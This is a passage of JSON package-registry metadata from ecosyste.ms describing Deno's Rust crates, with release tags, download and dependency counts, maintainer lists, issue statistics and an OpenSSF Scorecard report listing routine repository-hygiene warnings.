ps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:23:36.878Z","dependent_packages_count":3,"downloads":7094237,"downloads_period":"total","dependent_repos_count":316,"rankings":{"downloads":2.8701692797429565,"dependent_repos_count":2.307143069645673,"dependent_packages_count":9.156213942755052,"stargazers_count":12.09799779847083,"forks_count":9.989577129243598,"docker_downloads_count":3.236226684728404,"average":6.609554650764419},"purl":"pkg:cargo/deno_ops","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_ops","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_ops","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_ops/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ops/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-09-10T08:59:25.469Z","updated_at":"2025-09-10T08:59:25.469Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:26.978Z","updated_at":"2023-07-18T22:41:26.978Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":10931510,"name":"deno_resolver","ecosystem":"cargo","description":"Deno resolution algorithm","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":90,"first_release_published_at":"2024-09-27T14:55:08.491Z","latest_release_published_at":"2026-08-27T15:21:01.229Z","latest_release_number":"0.89.0","last_synced_at":"2026-09-07T22:57:06.698Z","created_at":"2024-09-27T15:03:07.510Z","updated_at":"2026-09-07T22:57:06.698Z","registry_url":"https://crates.io/crates/deno_resolver/","install_command":"cargo install deno_resolver","documentation_url":"https://docs.rs/deno_resolver/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using 